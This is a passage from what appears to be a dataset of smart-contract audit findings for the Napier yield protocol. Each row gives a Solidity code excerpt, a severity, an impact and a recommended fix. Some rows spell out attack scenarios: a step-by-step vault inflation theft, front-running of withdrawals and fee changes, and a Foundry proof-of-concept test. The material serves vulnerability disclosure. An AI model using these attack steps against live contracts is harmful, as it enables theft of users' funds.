The AMM pool might be unfairly arbitraged, resulting in a loss for the pool's LPs.","```\\nFile: PoolMath.sol\\n int256 internal constant N_COINS = 3;\\n..SNIP..\\n function swapExactBaseLpTokenForUnderlying(PoolState memory pool, uint256 exactBaseLptIn)\\n internal\\n..SNIP..\\n // Note: Here we are multiplying by N_COINS because the swap formula is defined in terms of the amount of PT being swapped.\\n // BaseLpt is equivalent to 3 times the amount of PT due to the initial deposit of 1:1:1:1=pt1:pt2:pt3:Lp share in Curve pool.\\n exactBaseLptIn.neg() * N_COINS\\n..SNIP..\\n function swapUnderlyingForExactBaseLpToken(PoolState memory pool, uint256 exactBaseLptOut)\\n..SNIP..\\n (int256 _netUnderlyingToAccount18, int256 _netUnderlyingFee18, int256 _netUnderlyingToProtocol18) = executeSwap(\\n pool,\\n // Note: sign is defined from the perspective of the swapper.\\n // positive because the swapper is buying pt\\n exactBaseLptOut.toInt256() * N_COINS\\n```\\n" +Victim's fund can be stolen due to rounding error and exchange rate manipulation,high,"Victim's funds can be stolen by malicious users by exploiting the rounding error and through exchange rate manipulation.\\nThe LST Adaptor attempts to guard against the well-known vault inflation attack by reverting the TX when the amount of shares minted is rounded down to zero in Line 78 below.\\n```\\nFile: BaseLSTAdapter.sol\\n function prefundedDeposit() external nonReentrant returns (uint256, uint256) {\\n uint256 bufferEthCache = bufferEth; // cache storage reads\\n uint256 queueEthCache = withdrawalQueueEth; // cache storage reads\\n uint256 assets = IWETH9(WETH).balanceOf(address(this)) - bufferEthCache; // amount of WETH deposited at this time\\n uint256 shares = previewDeposit(assets);\\n\\n if (assets == 0) return (0, 0);\\n if (shares == 0) revert ZeroShares();\\n```\\n\\nHowever, this control alone is not sufficient to guard against vault inflation attacks.\\nLet's assume the following scenario (ignoring fee 
for simplicity's sake):\\nThe victim initiates a transaction that deposits 10 ETH as the underlying asset when there are no issued estETH shares.\\nThe attacker observes the victim's transaction and deposits 1 wei of ETH (issuing 1 wei of estETH share) before the victim's transaction. 1 wei of estETH share worth of PT and YT will be minted to the attacker.\\nThen, the attacker executes a transaction to directly transfer 5 stETH to the adaptor. The exchange rate at this point is `1 wei / (5 ETH + 1 wei)`. Note that the `totalAssets` function uses the `balanceOf` function to compute the total underlying assets owned by the adaptor. Thus, this direct transfer will increase the total assets amount.\\nWhen the victim's transaction is executed, the number of estETH shares issued is calculated as 10 ETH * `1 wei / (5 ETH + 1 wei)`, resulting in 1 wei being issued due to round-down.\\nThe attacker will combine the PT + YT obtained earlier to redeem 1 wei of estETH share from the adaptor.\\nThe attacker, holding 50% of the issued estETH shares (indirectly via the PT+YT he owned), receives `(15 ETH + 1 wei) / 2` as the underlying asset.\\nThe attacker seizes 25% of the underlying asset (2.5 ETH) deposited by the victim.\\nThis scenario demonstrates that even when a revert is triggered due to the number of issued estETH share being 0, it does not prevent the attacker from capturing the user's funds through exchange rate manipulation.",Following are some of the measures that could help to prevent such an attack:\\nMint a certain amount of shares to zero address (dead address) during contract deployment (similar to what has been implemented in Uniswap V2)\\nAvoid using the `balanceOf` so that malicious users cannot transfer directly to the contract to increase the assets per share. 
Track the total assets internally via a variable.,Loss of assets for the victim.,"```\\nFile: BaseLSTAdapter.sol\\n function prefundedDeposit() external nonReentrant returns (uint256, uint256) {\\n uint256 bufferEthCache = bufferEth; // cache storage reads\\n uint256 queueEthCache = withdrawalQueueEth; // cache storage reads\\n uint256 assets = IWETH9(WETH).balanceOf(address(this)) - bufferEthCache; // amount of WETH deposited at this time\\n uint256 shares = previewDeposit(assets);\\n\\n if (assets == 0) return (0, 0);\\n if (shares == 0) revert ZeroShares();\\n```\\n" +Anyone can convert someone's unclaimed yield to PT + YT,medium,"Anyone can convert someone's unclaimed yield to PT + YT, leading to a loss of assets for the victim.\\nAssume that Alice has accumulated 100 Target Tokens in her account's unclaimed yields. She is only interested in holding the Target token (e.g., she is might be long Target token). She intends to collect those Target Tokens sometime later.\\nBob could disrupt Alice's plan by calling `issue` function with the parameter (to=Alice, underlyingAmount=0). The function will convert all 100 Target Tokens stored within Alice's account's unclaimed yield to PT + YT and send them to her, which Alice does not want or need in the first place.\\nLine 196 below will clear Alice's entire unclaimed yield before computing the accrued interest at Line 203. 
The accrued interest will be used to mint the PT and YT (Refer to Line 217 and Line 224 below).\\n```\\nFile: Tranche.sol\\n function issue(\\n address to,\\n uint256 underlyingAmount\\n ) external nonReentrant whenNotPaused notExpired returns (uint256 issued) {\\n..SNIP..\\n lscales[to] = _maxscale;\\n delete unclaimedYields[to];\\n\\n uint256 yBal = _yt.balanceOf(to);\\n // If recipient has unclaimed interest, claim it and then reinvest it to issue more PT and YT.\\n // Reminder: lscale is the last scale when the YT balance of the user was updated.\\n if (_lscale != 0) {\\n accruedInTarget += _computeAccruedInterestInTarget(_maxscale, _lscale, yBal);\\n }\\n..SNIP..\\n uint256 sharesUsed = sharesMinted + accruedInTarget;\\n uint256 fee = sharesUsed.mulDivUp(issuanceFeeBps, MAX_BPS);\\n issued = (sharesUsed - fee).mulWadDown(_maxscale);\\n\\n // Accumulate issueance fee in units of target token\\n issuanceFees += fee;\\n // Mint PT and YT to user\\n _mint(to, issued);\\n _yt.mint(to, issued);\\n```\\n\\nThe market value of the PT + YT might be lower than the market value of the Target Token. In this case, Alice will lose due to Bob's malicious action.\\nAnother `issue` is that when Bob calls `issue` function on behalf of Alice's account, the unclaimed target tokens will be subjected to the issuance fee (See Line 218 above). 
Thus, even if the market value of PT + YT is exactly the same as that of the Target Token, Alice is still guaranteed to suffer a loss from Bob's malicious action.\\nIf Alice had collected the unclaimed yield via the collect function, she would have received the total value of the yield in the underlying asset terms, as a collection of yield is not subjected to any fee.",Consider not allowing anyone to issue PY+YT on behalf of someone's account.,Loss of assets for the victim.,"```\\nFile: Tranche.sol\\n function issue(\\n address to,\\n uint256 underlyingAmount\\n ) external nonReentrant whenNotPaused notExpired returns (uint256 issued) {\\n..SNIP..\\n lscales[to] = _maxscale;\\n delete unclaimedYields[to];\\n\\n uint256 yBal = _yt.balanceOf(to);\\n // If recipient has unclaimed interest, claim it and then reinvest it to issue more PT and YT.\\n // Reminder: lscale is the last scale when the YT balance of the user was updated.\\n if (_lscale != 0) {\\n accruedInTarget += _computeAccruedInterestInTarget(_maxscale, _lscale, yBal);\\n }\\n..SNIP..\\n uint256 sharesUsed = sharesMinted + accruedInTarget;\\n uint256 fee = sharesUsed.mulDivUp(issuanceFeeBps, MAX_BPS);\\n issued = (sharesUsed - fee).mulWadDown(_maxscale);\\n\\n // Accumulate issueance fee in units of target token\\n issuanceFees += fee;\\n // Mint PT and YT to user\\n _mint(to, issued);\\n _yt.mint(to, issued);\\n```\\n" +`withdraw` function does not comply with ERC5095,medium,"The `withdraw` function of Tranche/PT does not comply with ERC5095 as it does not return the exact amount of underlying assets requested by the users.\\nQ: Is the code/contract expected to comply with any EIPs? Are there specific assumptions around adhering to those EIPs that Watsons should be aware of? EIP20 and IERC5095\\nFollowing is the specification of the `withdraw` function of ERC5095. 
It stated that the user must receive exactly `underlyingAmount` of underlying tokens.\\nwithdraw Burns principalAmount from holder and sends exactly underlyingAmount of underlying tokens to receiver.\\nHowever, the `withdraw` function does not comply with this requirement.\\nOn a high-level, the reason is that Line 337 will compute the number of shares that need to be redeemed to receive `underlyingAmount` number of underlying tokens from the adaptor. The main problem here is that the division done here is rounded down. Thus, the `sharesRedeem` will be lower than expected. Consequently, when `sharesRedeem` number of shares are redeemed at Line 346 below, the users will not receive an exact number of `underlyingAmount` of underlying tokens.\\n```\\nFile: Tranche.sol\\n function withdraw(\\n uint256 underlyingAmount,\\n address to,\\n address from\\n ) external override nonReentrant expired returns (uint256) {\\n GlobalScales memory _gscales = gscales;\\n uint256 cscale = _updateGlobalScalesCache(_gscales);\\n\\n // Compute the shares to be redeemed\\n uint256 sharesRedeem = underlyingAmount.divWadDown(cscale);\\n uint256 principalAmount = _computePrincipalTokenRedeemed(_gscales, sharesRedeem);\\n\\n // Update the global scales\\n gscales = _gscales;\\n // Burn PT tokens from `from`\\n _burnFrom(from, principalAmount);\\n // Withdraw underlying tokens from the adapter and transfer them to `to`\\n _target.safeTransfer(address(adapter), sharesRedeem);\\n (uint256 underlyingWithdrawn, ) = adapter.prefundedRedeem(to);\\n```\\n",Update the `withdraw` function to send exactly `underlyingAmount` number of underlying tokens to the caller so that the Tranche will be aligned with the ERC5095 specification.,The tranche/PT does not align with the ERC5095 specification.,"```\\nFile: Tranche.sol\\n function withdraw(\\n uint256 underlyingAmount,\\n address to,\\n address from\\n ) external override nonReentrant expired returns (uint256) {\\n GlobalScales memory _gscales = 
gscales;\\n uint256 cscale = _updateGlobalScalesCache(_gscales);\\n\\n // Compute the shares to be redeemed\\n uint256 sharesRedeem = underlyingAmount.divWadDown(cscale);\\n uint256 principalAmount = _computePrincipalTokenRedeemed(_gscales, sharesRedeem);\\n\\n // Update the global scales\\n gscales = _gscales;\\n // Burn PT tokens from `from`\\n _burnFrom(from, principalAmount);\\n // Withdraw underlying tokens from the adapter and transfer them to `to`\\n _target.safeTransfer(address(adapter), sharesRedeem);\\n (uint256 underlyingWithdrawn, ) = adapter.prefundedRedeem(to);\\n```\\n" +Permissioned rebalancing functions leading to loss of assets,medium,"Permissioned rebalancing functions that could only be accessed by admin could lead to a loss of assets.\\nPer the contest's README page, it stated that the admin/owner is ""RESTRICTED"". Thus, any finding showing that the owner/admin can steal a user's funds, cause loss of funds or harm to the users, or cause the user's fund to be struck is valid in this audit contest.\\nQ: Is the admin/owner of the protocol/contracts TRUSTED or RESTRICTED?\\nRESTRICTED\\nThe following describes a way where the admin can block users from withdrawing their assets from the protocol\\nThe admin calls the `setRebalancer` function to set the rebalance to a wallet address owned by them.\\n```\\nFile: BaseLSTAdapter.sol\\n function setRebalancer(address _rebalancer) external onlyOwner {\\n rebalancer = _rebalancer;\\n }\\n```\\n\\nThe admin calls the `setTargetBufferPercentage` the set the `targetBufferPercentage` to the smallest possible value of 1%. This will cause only 1% of the total ETH deposited by all the users to reside on the adaptor contract. 
This will cause the ETH buffer to deplete quickly and cause all the redemption and withdrawal to revert.\\n```\\nFile: BaseLSTAdapter.sol\\n function setTargetBufferPercentage(uint256 _targetBufferPercentage) external onlyRebalancer {\\n if (_targetBufferPercentage < MIN_BUFFER_PERCENTAGE || _targetBufferPercentage > BUFFER_PERCENTAGE_PRECISION) {\\n revert InvalidBufferPercentage();\\n }\\n targetBufferPercentage = _targetBufferPercentage;\\n }\\n```\\n\\nThe owner calls the `setRebalancer` function again and sets the rebalancer address to `address(0)`. As such, no one has the ability to call functions that are only accessible by rebalancer. The `requestWithdrawal` and `requestWithdrawalAll` functions are only accessible by rebalancer. Thus, no one can call these two functions to replenish the ETH buffer in the adaptor contract.\\nWhen this state is reached, users can no longer withdraw their assets from the protocol, and their assets are stuck in the contract. This effectively causes them to lose their assets.","To prevent the above scenario, the minimum `targetBufferPercentage` should be set to a higher percentage such as 5 or 10%, and the `requestWithdrawal` function should be made permissionless, so that even if the rebalancer does not do its job, anyone else can still initiate the rebalancing process to replenish the adaptor's ETH buffer for user's withdrawal.",Loss of assets for the victim.,```\\nFile: BaseLSTAdapter.sol\\n function setRebalancer(address _rebalancer) external onlyOwner {\\n rebalancer = _rebalancer;\\n }\\n```\\n +Unable to deposit to Tranche/Adaptor under certain conditions,medium,"Minting of PT and YT is the core feature of the protocol. 
Without the ability to mint PT and YT, the protocol would not operate.\\nThe user cannot deposit into the Tranche to issue new PT + YT under certain conditions.\\nThe comment in Line 133 below mentioned that the `stakeAmount` can be zero.\\nThe reason is that when `targetBufferEth < (availableEth + queueEthCache)`, it is possible that there is a pending withdrawal request (queueEthCache) and no available ETH left in the buffer (availableEth = 0). Refer to the comment in Line 123 below.\\nAs a result, the code at Line 127 below will restrict the amount of ETH to be staked and set the `stakeAmount` to zero.\\n```\\nFile: BaseLSTAdapter.sol\\n function prefundedDeposit() external nonReentrant returns (uint256, uint256) {\\n..SNIP..\\n uint256 stakeAmount;\\n unchecked {\\n stakeAmount = availableEth + queueEthCache - targetBufferEth; // non-zero, no underflow\\n }\\n // If the stake amount exceeds 95% of the available ETH, cap the stake amount.\\n // This is to prevent the buffer from being completely drained. 
This is not a complete solution.\\n //\\n // The condition: stakeAmount > availableEth, is equivalent to: queueEthCache > targetBufferEth\\n // Possible scenarios:\\n // - Target buffer percentage was changed to a lower value and there is a large withdrawal request pending.\\n // - There is a pending withdrawal request and the available ETH are not left in the buffer.\\n // - There is no pending withdrawal request and the available ETH are not left in the buffer.\\n uint256 maxStakeAmount = (availableEth * 95) / 100;\\n if (stakeAmount > maxStakeAmount) {\\n stakeAmount = maxStakeAmount; // max 95% of the available ETH\\n }\\n\\n /// INTERACT ///\\n // Deposit into the yield source\\n // Actual amount of ETH spent may be less than the requested amount.\\n stakeAmount = _stake(stakeAmount); // stake amount can be 0\\n```\\n\\nHowever, the issue is that when `_stake` function is called with `stakeAmount` set to zero, it will result in zero ETH being staked and Line 77 below will revert.\\n```\\nFile: StEtherAdapter.sol\\n /// @inheritdoc BaseLSTAdapter\\n /// @dev Lido has a limit on the amount of ETH that can be staked.\\n /// @dev Need to check the current staking limit before staking to prevent DoS.\\n function _stake(uint256 stakeAmount) internal override returns (uint256) {\\n uint256 stakeLimit = STETH.getCurrentStakeLimit();\\n if (stakeAmount > stakeLimit) {\\n // Cap stake amount\\n stakeAmount = stakeLimit;\\n }\\n\\n IWETH9(Constants.WETH).withdraw(stakeAmount);\\n uint256 _stETHAmt = STETH.submit{value: stakeAmount}(address(this));\\n\\n if (_stETHAmt == 0) revert InvariantViolation();\\n return stakeAmount;\\n }\\n```\\n\\nA similar issue also occurs for the sFRXETH adaptor. 
If `FRXETH_MINTER.submit` function is called with `stakeAmount == 0`, it will revert.\\n```\\nFile: SFrxETHAdapter.sol\\n /// @notice Mint sfrxETH using WETH\\n function _stake(uint256 stakeAmount) internal override returns (uint256) {\\n IWETH9(Constants.WETH).withdraw(stakeAmount);\\n FRXETH_MINTER.submit{value: stakeAmount}();\\n uint256 received = STAKED_FRXETH.deposit(stakeAmount, address(this));\\n if (received == 0) revert InvariantViolation();\\n\\n return stakeAmount;\\n }\\n```\\n\\nThe following shows that the `FRXETH_MINTER.submit` function will revert if submitted ETH is zero below.\\n```\\n/// @notice Mint frxETH to the recipient using sender's funds. Internal portion\\nfunction _submit(address recipient) internal nonReentrant {\\n // Initial pause and value checks\\n require(!submitPaused, ""Submit is paused"");\\n require(msg.value != 0, ""Cannot submit 0"");\\n```\\n","Short-circuit the `_stake` function by returning zero value immediately if the `stakeAmount` is zero.\\nFile: StEtherAdapter.sol\\n```\\nfunction _stake(uint256 stakeAmount) internal override returns (uint256) {\\n// Add the line below\\n if (stakeAmount == 0) return 0; \\n uint256 stakeLimit = STETH.getCurrentStakeLimit();\\n if (stakeAmount > stakeLimit) {\\n // Cap stake amount\\n stakeAmount = stakeLimit;\\n }\\n\\n IWETH9(Constants.WETH).withdraw(stakeAmount);\\n uint256 _stETHAmt = STETH.submit{value: stakeAmount}(address(this));\\n\\n if (_stETHAmt == 0) revert InvariantViolation();\\n return stakeAmount;\\n}\\n```\\n\\nFile: SFrxETHAdapter.sol\\n```\\nfunction _stake(uint256 stakeAmount) internal override returns (uint256) {\\n// Add the line below\\n if (stakeAmount == 0) return 0; \\n IWETH9(Constants.WETH).withdraw(stakeAmount);\\n FRXETH_MINTER.submit{value: stakeAmount}();\\n uint256 received = STAKED_FRXETH.deposit(stakeAmount, address(this));\\n if (received == 0) revert InvariantViolation();\\n\\n return stakeAmount;\\n}\\n```\\n","Minting of PT and YT is the core 
feature of the protocol. Without the ability to mint PT and YT, the protocol would not operate. The user cannot deposit into the Tranche to issue new PT + YT under certain conditions. Breaking of core protocol/contract functionality.","```\\nFile: BaseLSTAdapter.sol\\n function prefundedDeposit() external nonReentrant returns (uint256, uint256) {\\n..SNIP..\\n uint256 stakeAmount;\\n unchecked {\\n stakeAmount = availableEth + queueEthCache - targetBufferEth; // non-zero, no underflow\\n }\\n // If the stake amount exceeds 95% of the available ETH, cap the stake amount.\\n // This is to prevent the buffer from being completely drained. This is not a complete solution.\\n //\\n // The condition: stakeAmount > availableEth, is equivalent to: queueEthCache > targetBufferEth\\n // Possible scenarios:\\n // - Target buffer percentage was changed to a lower value and there is a large withdrawal request pending.\\n // - There is a pending withdrawal request and the available ETH are not left in the buffer.\\n // - There is no pending withdrawal request and the available ETH are not left in the buffer.\\n uint256 maxStakeAmount = (availableEth * 95) / 100;\\n if (stakeAmount > maxStakeAmount) {\\n stakeAmount = maxStakeAmount; // max 95% of the available ETH\\n }\\n\\n /// INTERACT ///\\n // Deposit into the yield source\\n // Actual amount of ETH spent may be less than the requested amount.\\n stakeAmount = _stake(stakeAmount); // stake amount can be 0\\n```\\n" +Napier pool owner can unfairly increase protocol fees on swaps to earn more revenue,medium,"Currently there is no limit to how often a `poolOwner` can update fees which can be abused to earn more fees by charging users higher swap fees than they expect.\\nThe `NapierPool::setFeeParameter` function allows the `poolOwner` to set the `protocolFeePercent` at any point to a maximum value of 100%. The `poolOwner` is a trusted party but should not be able to abuse protocol settings to earn more revenue. 
There are no limits to how often this can be updated.\\n```\\n function test_protocol_owner_frontRuns_swaps_with_higher_fees() public whenMaturityNotPassed {\\n // pre-condition\\n vm.warp(maturity - 30 days);\\n deal(address(pts[0]), alice, type(uint96).max, false); // ensure alice has enough pt\\n uint256 preBaseLptSupply = tricrypto.totalSupply();\\n uint256 ptInDesired = 100 * ONE_UNDERLYING;\\n uint256 expectedBaseLptIssued = tricrypto.calc_token_amount([ptInDesired, 0, 0], true);\\n\\n // Pool owner sees swap about to occur and front runs updating fees to max value\\n vm.startPrank(owner);\\n pool.setFeeParameter(""protocolFeePercent"", 100);\\n vm.stopPrank();\\n\\n // execute\\n vm.prank(alice);\\n uint256 underlyingOut = pool.swapPtForUnderlying(\\n 0, ptInDesired, recipient, abi.encode(CallbackInputType.SwapPtForUnderlying, SwapInput(underlying, pts[0]))\\n );\\n // sanity check\\n uint256 protocolFee = SwapEventsLib.getProtocolFeeFromLastSwapEvent(pool);\\n assertGt(protocolFee, 0, ""fee should be charged"");\\n }\\n```\\n",Introduce a delay in fee updates to ensure users receive the fees they expect.,A malicious `poolOwner` could change the protocol swap fees unfairly for users by front-running swaps and increasing fees to higher values on unsuspecting users. 
An example scenario is:\\nThe `poolOwner` sets swap fees to 1% to attract users\\nThe `poolOwner` front runs all swaps and changes the swap fees to the maximum value of 100%\\nAfter the swap the `poolOwner` resets `protocolFeePercent` to a low value to attract more users,"```\\n function test_protocol_owner_frontRuns_swaps_with_higher_fees() public whenMaturityNotPassed {\\n // pre-condition\\n vm.warp(maturity - 30 days);\\n deal(address(pts[0]), alice, type(uint96).max, false); // ensure alice has enough pt\\n uint256 preBaseLptSupply = tricrypto.totalSupply();\\n uint256 ptInDesired = 100 * ONE_UNDERLYING;\\n uint256 expectedBaseLptIssued = tricrypto.calc_token_amount([ptInDesired, 0, 0], true);\\n\\n // Pool owner sees swap about to occur and front runs updating fees to max value\\n vm.startPrank(owner);\\n pool.setFeeParameter(""protocolFeePercent"", 100);\\n vm.stopPrank();\\n\\n // execute\\n vm.prank(alice);\\n uint256 underlyingOut = pool.swapPtForUnderlying(\\n 0, ptInDesired, recipient, abi.encode(CallbackInputType.SwapPtForUnderlying, SwapInput(underlying, pts[0]))\\n );\\n // sanity check\\n uint256 protocolFee = SwapEventsLib.getProtocolFeeFromLastSwapEvent(pool);\\n assertGt(protocolFee, 0, ""fee should be charged"");\\n }\\n```\\n" +Benign esfrxETH holders incur more loss than expected,medium,"Malicious esfrxETH holders can avoid ""pro-rated"" loss and have the remaining esfrxETH holders incur all the loss due to the fee charged by FRAX during unstaking. As a result, the rest of the esfrxETH holders incur more losses than expected compared to if malicious esfrxETH holders had not used this trick in the first place.\\n```\\nFile: SFrxETHAdapter.sol\\n/// @title SFrxETHAdapter - esfrxETH\\n/// @dev Important security note:\\n/// 1. 
The vault share price (esfrxETH / WETH) increases as sfrxETH accrues staking rewards.\\n/// However, the share price decreases when frxETH (sfrxETH) is withdrawn.\\n/// Withdrawals are processed by the FraxEther redemption queue contract.\\n/// Frax takes a fee at the time of withdrawal requests, which temporarily reduces the share price.\\n/// This loss is pro-rated among all esfrxETH holders.\\n/// As a mitigation measure, we allow only authorized rebalancers to request withdrawals.\\n///\\n/// 2. This contract doesn't independently keep track of the sfrxETH balance, so it is possible\\n/// for an attacker to directly transfer sfrxETH to this contract, increase the share price.\\ncontract SFrxETHAdapter is BaseLSTAdapter, IERC721Receiver {\\n```\\n\\nIn the SFrxETHAdapter's comments above, it is stated that the share price will decrease due to the fee taken by FRAX during the withdrawal request. This loss is supposed to be 'pro-rated' among all esfrxETH holders. However, this report reveals that malicious esfrxETH holders can circumvent this 'pro-rated' loss, leaving the remaining esfrxETH holders to bear the entire loss. Furthermore, the report demonstrates that the current mitigation measure, which allows only authorized rebalancers to request withdrawals, is insufficient to prevent this exploitation.\\nWhenever a rebalancers submit a withdrawal request to withdraw staked ETH from FRAX, it will first reside in the mempool of the blockchain and anyone can see it. Malicious esfrxETH holders can front-run it to withdraw their shares from the adaptor.\\nWhen the withdrawal request TX is executed, the remaining esfrxETH holders in the adaptor will incur the fee. Once executed, the malicious esfrxETH deposits back to the adaptors.\\nNote that no fee is charged to the users for any deposit or withdrawal operation. 
Thus, as long as the gain from this action is more than the gas cost, it makes sense for the esfrxETH holders to do so.",The best way to discourage users from withdrawing their assets and depositing them back to take advantage of a particular event is to impose a fee upon depositing and withdrawing.,The rest of the esfrxETH holders incur more losses than expected compared to if malicious esfrxETH holders had not used this trick in the first place.,"```\\nFile: SFrxETHAdapter.sol\\n/// @title SFrxETHAdapter - esfrxETH\\n/// @dev Important security note:\\n/// 1. The vault share price (esfrxETH / WETH) increases as sfrxETH accrues staking rewards.\\n/// However, the share price decreases when frxETH (sfrxETH) is withdrawn.\\n/// Withdrawals are processed by the FraxEther redemption queue contract.\\n/// Frax takes a fee at the time of withdrawal requests, which temporarily reduces the share price.\\n/// This loss is pro-rated among all esfrxETH holders.\\n/// As a mitigation measure, we allow only authorized rebalancers to request withdrawals.\\n///\\n/// 2. This contract doesn't independently keep track of the sfrxETH balance, so it is possible\\n/// for an attacker to directly transfer sfrxETH to this contract, increase the share price.\\ncontract SFrxETHAdapter is BaseLSTAdapter, IERC721Receiver {\\n```\\n" +Lack of slippage control for `issue` function,medium,"The lack of slippage control for `issue` function can lead to a loss of assets for the affected users.\\nDuring the issuance, the user will deposit underlying assets (e.g., ETH) to the Tranche contract, and the Tranche contract will forward them to the Adaptor contract for depositing at Line 208 below. The number of shares minted is depending on the current scale of the adaptor. The current scale of the adaptor can increase or decrease at any time, depending on the current on-chain condition when the transaction is executed. 
For instance, the LIDO's daily oracle/rebase update will increase the stETH balance, which will, in turn, increase the adaptor's scale. On the other hand, if there is a mass validator slashing event, the ETH claimed from the withdrawal queue will be less than expected, leading to a decrease in the adaptor's scale. Thus, one cannot ensure the result from the off-chain simulation will be the same as the on-chain execution.\\nHaving said that, the number of shared minted will vary (larger or smaller than expected) if there is a change in the current scale. Assuming that Alice determined off-chain that depositing 100 ETH would issue $x$ amount of PT/YT. When she executes the TX, the scale increases, leading to the amount of PT/YT issued being less than $x$. The slippage is more than what she can accept.\\nIn summary, the `issue` function lacks the slippage control that allows the users to revert if the amount of PT/YT they received is less than the amount they expected.\\n```\\nFile: Tranche.sol\\n function issue(\\n address to,\\n uint256 underlyingAmount\\n ) external nonReentrant whenNotPaused notExpired returns (uint256 issued) {\\n..SNIP..\\n // Transfer underlying from user to adapter and deposit it into adapter to get target token\\n _underlying.safeTransferFrom(msg.sender, address(adapter), underlyingAmount);\\n (, uint256 sharesMinted) = adapter.prefundedDeposit();\\n\\n // Deduct the issuance fee from the amount of target token minted + reinvested yield\\n // Fee should be rounded up towards the protocol (against the user) so that issued principal is rounded down\\n // Hackmd: F0\\n // ptIssued\\n // = (u/s + y - fee) * S\\n // = (sharesUsed - fee) * S\\n // where u = underlyingAmount, s = current scale, y = reinvested yield, S = maxscale\\n uint256 sharesUsed = sharesMinted + accruedInTarget;\\n uint256 fee = sharesUsed.mulDivUp(issuanceFeeBps, MAX_BPS);\\n issued = (sharesUsed - fee).mulWadDown(_maxscale);\\n\\n // Accumulate issueance fee in units of 
target token\\n issuanceFees += fee;\\n // Mint PT and YT to user\\n _mint(to, issued);\\n _yt.mint(to, issued);\\n\\n emit Issue(msg.sender, to, issued, sharesUsed);\\n }\\n\\n```\\n",Implement a slippage control that allows the users to revert if the amount of PT/YT they received is less than the amount they expected.,Loss of assets for the affected users.,"```\\nFile: Tranche.sol\\n function issue(\\n address to,\\n uint256 underlyingAmount\\n ) external nonReentrant whenNotPaused notExpired returns (uint256 issued) {\\n..SNIP..\\n // Transfer underlying from user to adapter and deposit it into adapter to get target token\\n _underlying.safeTransferFrom(msg.sender, address(adapter), underlyingAmount);\\n (, uint256 sharesMinted) = adapter.prefundedDeposit();\\n\\n // Deduct the issuance fee from the amount of target token minted + reinvested yield\\n // Fee should be rounded up towards the protocol (against the user) so that issued principal is rounded down\\n // Hackmd: F0\\n // ptIssued\\n // = (u/s + y - fee) * S\\n // = (sharesUsed - fee) * S\\n // where u = underlyingAmount, s = current scale, y = reinvested yield, S = maxscale\\n uint256 sharesUsed = sharesMinted + accruedInTarget;\\n uint256 fee = sharesUsed.mulDivUp(issuanceFeeBps, MAX_BPS);\\n issued = (sharesUsed - fee).mulWadDown(_maxscale);\\n\\n // Accumulate issueance fee in units of target token\\n issuanceFees += fee;\\n // Mint PT and YT to user\\n _mint(to, issued);\\n _yt.mint(to, issued);\\n\\n emit Issue(msg.sender, to, issued, sharesUsed);\\n }\\n\\n```\\n" +Users unable to withdraw their funds due to FRAX admin action,medium,"FRAX admin action can lead to the fund of Naiper protocol and its users being stuck, resulting in users being unable to withdraw their assets.\\nPer the contest page, the admins of the protocols that Napier integrates with are considered ""RESTRICTED"". 
This means that any issue related to FRAX's admin action that could negatively affect Napier protocol/users will be considered valid in this audit contest.\\nQ: Are the admins of the protocols your contracts integrate with (if any) TRUSTED or RESTRICTED? RESTRICTED\\nWhen the Adaptor needs to unstake its staked ETH to replenish its ETH buffer so that users can redeem/withdraw their funds, it will first join the FRAX's redemption queue, and the queue will issue a redemption NFT afterward. After a certain period, the adaptor can claim their ETH by burning the redemption NFT at Line 65 via the `burnRedemptionTicketNft` function.\\n```\\nFile: SFrxETHAdapter.sol\\n function claimWithdrawal() external override {\\n uint256 _requestId = requestId;\\n uint256 _withdrawalQueueEth = withdrawalQueueEth;\\n if (_requestId == 0) revert NoPendingWithdrawal();\\n\\n /// WRITE ///\\n delete withdrawalQueueEth;\\n delete requestId;\\n bufferEth += _withdrawalQueueEth.toUint128();\\n\\n /// INTERACT ///\\n uint256 balanceBefore = address(this).balance;\\n REDEMPTION_QUEUE.burnRedemptionTicketNft(_requestId, payable(this));\\n if (address(this).balance < balanceBefore + _withdrawalQueueEth) revert InvariantViolation();\\n\\n IWETH9(Constants.WETH).deposit{value: _withdrawalQueueEth}();\\n }\\n```\\n\\nHowever, it is possible for FRAX's admin to disrupt the redemption process of the adaptor, resulting in Napier users being unable to withdraw their funds. 
When the `burnRedemptionTicketNft` function is executed, the redemption NFT will be burned, and native ETH residing in the `FraxEtherRedemptionQueue` contract will be sent to the adaptor at Line 498 below\\n```\\nFile: FraxEtherRedemptionQueue.sol\\n function burnRedemptionTicketNft(uint256 _nftId, address payable _recipient) external nonReentrant {\\n..SNIP..\\n // Effects: Burn frxEth to match the amount of ether sent to user 1:1\\n FRX_ETH.burn(_redemptionQueueItem.amount);\\n\\n // Interactions: Transfer ETH to recipient, minus the fee\\n (bool _success, ) = _recipient.call{ value: _redemptionQueueItem.amount }("""");\\n if (!_success) revert InvalidEthTransfer();\\n```\\n\\nFRAX admin could execute the `recoverEther` function to transfer out all the Native ETH residing in the `FraxEtherRedemptionQueue` contract, resulting in the NFT redemption failing due to lack of ETH.\\n```\\nFile: FraxEtherRedemptionQueue.sol\\n /// @notice Recover ETH from exits where people early exited their NFT for frxETH, or when someone mistakenly directly sends ETH here\\n /// @param _amount Amount of ETH to recover\\n function recoverEther(uint256 _amount) external {\\n _requireSenderIsTimelock();\\n\\n (bool _success, ) = address(msg.sender).call{ value: _amount }("""");\\n if (!_success) revert InvalidEthTransfer();\\n\\n emit RecoverEther({ recipient: msg.sender, amount: _amount });\\n }\\n```\\n\\nAs a result, Napier users will not be able to withdraw their funds.",Ensure that the protocol team and its users are aware of the risks of such an event and develop a contingency plan to manage it.,"The fund of Naiper protocol and its users will be stuck, resulting in users being unable to withdraw their assets.","```\\nFile: SFrxETHAdapter.sol\\n function claimWithdrawal() external override {\\n uint256 _requestId = requestId;\\n uint256 _withdrawalQueueEth = withdrawalQueueEth;\\n if (_requestId == 0) revert NoPendingWithdrawal();\\n\\n /// WRITE ///\\n delete withdrawalQueueEth;\\n 
